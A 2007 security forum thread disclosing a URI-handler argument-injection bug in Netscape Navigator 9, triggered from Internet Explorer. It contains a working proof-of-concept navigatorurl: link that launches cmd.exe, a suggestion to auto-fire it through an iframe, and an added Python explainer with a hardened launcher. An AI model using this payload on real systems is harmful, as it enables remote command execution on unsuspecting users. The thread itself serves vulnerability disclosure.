Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: nmcfeters
Date: July 14, 2007 12:26AM

I'm sure if you are looking at this, you've probably seen the research Rios and I have done over the past couple of months take off with a few new full disclosure postings... well, I didn't want to leave you bored for the weekend. Remember Rios's and Thor's FirefoxURL?

Here's a quote from Rios about the subject:

"This URI basically allows us to use IE to spawn an instance of FireFox (if the user has a recent version of firefox2 installed on the machine). Normally, this wouldn't be too big of an issue, however in this case, we can pass arbitrary arguments to the URI, which ultimately get passed to FireFox.exe. With this in mind, we can initiate an XSS if the user simply browses to my site with IE, and has a recent version of FireFox2 installed (XSS and CSRF apply)..... but WAIT.. it gets better... because we can control the arguments passed to FireFox.exe, we can do other fun things, like add a FireFox profile to the user's machine (without user consent)."

And not to be outdone, here's my follow-up of the same thing for Netscape Navigator 9, which uses navigatorurl: instead of firefoxurl:. This is Rios's original PoC for firefoxurl; all I did was change firefox to navigator... how funny is that?

navigatorurl:test"%20-chrome%20"javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)

Are we ready to stop pointing the finger yet? Seems like everyone is vulnerable.



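How the injection in the PoC above works, as an added example that is not code from the post, from Netscape or from Mozilla. The `HANDLER_COMMAND` string is an assumption shaped like a typical `shell\open\command` value, not the real registry entry on a Navigator 9 install, and the one-time percent-decode of the URI before substitution is also an assumption (consistent with the PoC's use of `%20` for spaces). A simplified Windows command-line tokenizer then shows how a double quote inside the URI closes the `-url "..."` argument so that `-chrome "javascript:..."` reaches the browser as separate arguments. `safe_launch_argv` is an added mitigation for illustration, not the vendor's fix.

```python
import urllib.parse

# Hypothetical shell\open\command value for the navigatorurl: handler. The real
# registry string on a Netscape Navigator 9 install is not given in the thread;
# this one is an assumption that mirrors the shape of the firefoxurl: handler.
HANDLER_COMMAND = r'"C:\Program Files\Netscape\navigator.exe" -url "%1"'

# Constructed inputs: a benign link, and the post's PoC shortened to alert(1)
# (the real PoC spawns cmd.exe through nsIProcess; the injection is identical).
BENIGN_URI = 'navigatorurl:http://example.com/page'
POC_URI = 'navigatorurl:test"%20-chrome%20"javascript:alert(1)'


def build_command_line(template, uri):
    """The behaviour being exploited: the launching shell percent-decodes the URI
    once (assumption, matching the PoC's use of %20 for spaces) and pastes it
    into %1 with no quoting or escaping of the attacker-supplied text."""
    return template.replace('%1', urllib.parse.unquote(uri))


def split_windows_cmdline(cmdline):
    """Simplified CommandLineToArgvW tokenizer: whitespace separates arguments,
    double quotes group, and backslashes are only special when they precede a
    quote (2n backslashes + quote -> n backslashes and a toggle; 2n+1 -> n
    backslashes and a literal quote)."""
    args, cur, in_quotes, have_arg, i, n = [], [], False, False, 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == '\\':
            j = i
            while j < n and cmdline[j] == '\\':
                j += 1
            nbs = j - i
            if j < n and cmdline[j] == '"':
                cur.append('\\' * (nbs // 2))
                if nbs % 2:            # odd count: the quote is literal
                    cur.append('"')
                    j += 1
                i = j                  # even count: the quote toggles below
            else:
                cur.append('\\' * nbs)
                i = j
            have_arg = True
        elif c == '"':
            in_quotes, have_arg, i = not in_quotes, True, i + 1
        elif c in ' \t' and not in_quotes:
            if have_arg:
                args.append(''.join(cur))
                cur, have_arg = [], False
            i += 1
        else:
            cur.append(c)
            have_arg, i = True, i + 1
    if have_arg:
        args.append(''.join(cur))
    return args


def launch_argv(template, uri):
    """argv the handler executable receives under the vulnerable substitution."""
    return split_windows_cmdline(build_command_line(template, uri))


class UnsafeUriError(ValueError):
    pass


def safe_launch_argv(template, uri, scheme='navigatorurl:'):
    """Hardened launcher (an added mitigation, not the vendor's fix): decode the
    URI once, then refuse anything that could close the quoted %1 argument or
    start a new one, so the whole URI always reaches the browser as one argv entry."""
    decoded = urllib.parse.unquote(uri)
    if not decoded.lower().startswith(scheme):
        raise UnsafeUriError('wrong scheme: %r' % decoded)
    if '"' in decoded or any(ch.isspace() or ord(ch) < 0x20 for ch in decoded):
        raise UnsafeUriError('quote or whitespace in URI: %r' % decoded)
    return split_windows_cmdline(template.replace('%1', decoded))


def is_rejected(template, uri):
    """True when the hardened launcher refuses the URI."""
    try:
        safe_launch_argv(template, uri)
    except UnsafeUriError:
        return True
    return False


if __name__ == '__main__':
    print('benign  :', launch_argv(HANDLER_COMMAND, BENIGN_URI))
    print('poc     :', launch_argv(HANDLER_COMMAND, POC_URI))
    print('hardened rejects poc:', is_rejected(HANDLER_COMMAND, POC_URI))
```

Run it and the PoC line shows the browser receiving `-url navigatorurl:test` followed by `-chrome javascript:alert(1)`, which is the whole bug: the handler cannot tell the injected `-chrome` from a flag the shell meant to pass. The same argv check is a quick way to audit any other `...url:` handler on a machine, by pointing the handler's command template at a program that just echoes its arguments.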
Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: nmcfeters
Date: July 14, 2007 12:40AM

Anyone up for calling this the month of URI bugs?

Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: Anonymous User
Date: July 14, 2007 04:41AM

Again nice one! (Impact: 35)



Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: nmcfeters
Date: July 14, 2007 09:55AM

Thanks Mario. Been a bit surprised at the slow response to the Trillian stuff... guess we'll keep releasing.

Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: Anonymous User
Date: July 14, 2007 10:31AM

Very much appreciated indeed!

Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: nmcfeters
Date: July 16, 2007 01:27PM

Really surprised that this one hasn't got more attention... it's actually the exact same thing as the firefoxurl flaw that Rios posted earlier, just now it's on Netscape Navigator 9. You can see the proof of concept link here: http://www.xs-sniper.com/sniperscope/IE-Pwns-Firefox.html

Totally surprising, the response to these; suffice it to say that we have more that will be released shortly.

Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: Anonymous User
Date: July 17, 2007 01:39AM

Did you send the stuff to the security mailing lists and Secunia? Maybe it would be interesting to see exploits for *nix too if possible. Also you could provide an exploit that auto-fires (the 'I have to click on the link' PoCs don't impress most users very much - no idea why).

Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: nmcfeters
Date: July 17, 2007 05:30AM

Yeah, pretty stupid, I mean, it's just as simple to put it in an <iframe> or something. I think we have submitted to Secunia, we had at least one thing there.

Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: Anonymous User
Date: July 17, 2007 11:13AM

Got my PM?
